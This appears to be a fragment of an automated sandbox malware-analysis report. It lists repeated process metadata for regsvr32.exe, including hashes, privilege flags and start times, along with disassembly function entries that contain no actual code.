Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 16:10:34 |
Start date: | 02/12/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff0f0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 16:10:34 |
Start date: | 02/12/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff0f0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 16:10:34 |
Start date: | 02/12/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff0f0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 16:10:35 |
Start date: | 02/12/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff0f0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|
Executed Functions |
---|
Non-executed Functions |
---|
Function 024E66F3, Relevance: .8, Instructions: 775COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 024E66E8, Relevance: .8, Instructions: 763COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 024E6753, Relevance: .8, Instructions: 757COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 024E6743, Relevance: .7, Instructions: 738COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 024E6340, Relevance: .4, Instructions: 365COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |